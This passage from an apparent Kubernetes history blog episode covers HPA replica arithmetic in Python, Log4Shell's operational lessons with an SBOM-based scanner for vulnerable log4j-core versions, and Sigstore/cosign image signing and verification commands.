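For a Pods metric like the one above, the autoscaler's documented core calculation is desiredReplicas = ceil(currentReplicas × currentMetricValue / desiredMetricValue), clamped to the configured bounds. The Python sketch below reproduces just that arithmetic; it leaves out the tolerance band, stabilization windows, and multi-metric handling, and the function name desired_replicas is only illustrative.

```python
import math


def desired_replicas(current_replicas, current_value, target_value,
                     min_replicas, max_replicas):
    """Core HPA scaling arithmetic, clamped to the min/max replica bounds."""
    raw = math.ceil(current_replicas * current_value / target_value)
    return max(min_replicas, min(max_replicas, raw))


# Target of 1.0 request/second per pod (1000m), bounds 2..20 as in the manifest.
print(desired_replicas(4, 2.5, 1.0, 2, 20))
print(desired_replicas(4, 10.0, 1.0, 2, 20))
print(desired_replicas(4, 0.1, 1.0, 2, 20))
```

The three calls show a scale-up to 10 replicas, a scale-up capped at maxReplicas, and a scale-down floored at minReplicas.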

The Log4Shell Moment (December 2021)

Log4Shell (CVE-2021-44228) hit on December 9, 2021. The vulnerability allowed unauthenticated remote code execution in Java applications that logged attacker-controlled input with Log4j 2 (versions up to 2.14.1). The blast radius was enormous: Log4j was in everything.

For Kubernetes operators, Log4Shell crystallized several operational realities:

Inventory problem: Do you know which of your pods is running a Java application? Do you know which version of Log4j it includes? Without an SBOM pipeline and admission-time image scanning, you probably don’t have a reliable answer.

Patch velocity problem: Once you know which images are vulnerable, how quickly can you rebuild and redeploy? Organizations with GitOps pipelines and image update automation (Flux’s image reflector, ArgoCD Image Updater) could respond in hours. Organizations without this infrastructure measured response time in days.

Runtime detection problem: Can you detect exploitation attempts in real time? Falco rules for Log4Shell JNDI lookup patterns were available within hours of disclosure — but only organizations already running Falco could use them.

Log4Shell made the case for supply chain security, image scanning, SBOM generation, and runtime detection tooling more effectively than any conference talk.
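The inventory question becomes a simple query once SBOMs exist. The Python sketch below assumes each image has a CycloneDX-style SBOM already parsed into a dictionary with a "components" list of name/version entries, and flags log4j-core versions from 2.0 up to (not including) 2.15.0, the first release that addressed CVE-2021-44228. It ignores the backported fixes on older release lines and the follow-up CVEs, and the image names and helper functions are hypothetical.

```python
import re

FIRST_FIXED = (2, 15, 0)  # first release addressing CVE-2021-44228


def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a comparable (major, minor, patch)."""
    numbers = re.findall(r"\d+", text.split("-")[0])
    parts = tuple(int(n) for n in numbers[:3])
    return parts + (0,) * (3 - len(parts))


def find_vulnerable_log4j(inventory):
    """Return (image, version) pairs whose SBOM lists an affected log4j-core."""
    hits = []
    for image, sbom in inventory.items():
        for component in sbom.get("components", []):
            if component.get("name") != "log4j-core":
                continue
            version = component.get("version", "")
            if (2, 0, 0) <= parse_version(version) < FIRST_FIXED:
                hits.append((image, version))
    return hits


inventory = {
    "ghcr.io/org/app:v1.0.0": {"components": [
        {"name": "log4j-core", "version": "2.14.1"},
        {"name": "jackson-databind", "version": "2.13.0"},
    ]},
    "ghcr.io/org/worker:v2.3.0": {"components": [
        {"name": "log4j-core", "version": "2.17.1"},
    ]},
}

print(find_vulnerable_log4j(inventory))
```

Without stored SBOMs, answering the same question means pulling and unpacking every image during the incident, which is where the days of response time went.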


Sigstore and the Supply Chain Response

In 2021, Sigstore’s tooling became usable in real pipelines: cosign (image signing) reached 1.0 that year, while rekor (transparency log) and fulcio (keyless signing via OIDC) matured toward the general availability they reached in 2022.

The keyless signing model was significant: instead of managing long-lived signing keys (which themselves become a supply chain risk), fulcio issues short-lived certificates tied to an OIDC identity (a GitHub Actions workflow, a GitLab CI job). The signature proves that a specific workflow built the image.

# Sign an image as part of CI (keyless, OIDC-based)
cosign sign --yes ghcr.io/org/app:v1.0.0

# Verify before deploying
cosign verify \
  --certificate-identity-regexp "https://github.com/org/app/.github/workflows/build.yml" \
  --certificate-oidc-issuer https://token.actions.githubusercontent.com \
  ghcr.io/org/app:v1.0.0

Policy engines (OPA/Gatekeeper, Kyverno) could be configured to reject pods using unsigned or unverified images at admission time — closing the loop from build provenance to runtime enforcement.


Key Takeaways

  • Dockershim deprecation in 1.20 was about removing the non-standard interface, not about dropping Docker image compatibility — containers built with Docker run on containerd or CRI-O without changes
  • The API removals in 1.22 were operationally painful but necessary — beta APIs in Kubernetes are not production-stable commitments
  • Pod Security Admission (PSP’s replacement) trades power for reliability — three fixed profiles enforced at the namespace level, built into the API server, no authorization edge cases
  • SolarWinds and Log4Shell made supply chain security a board-level concern; Sigstore, SBOM, and admission-time image verification moved from “nice to have” to operational requirements
  • Bound service account tokens (1.22 stable) addressed a persistent security gap: pod tokens that expire and are audience-restricted rather than long-lived cluster-wide credentials

What’s Next

← EP04: The Operator Era | EP06: The Runtime Reckoning →

Series: Kubernetes: From Borg to Platform Engineering | linuxcent.com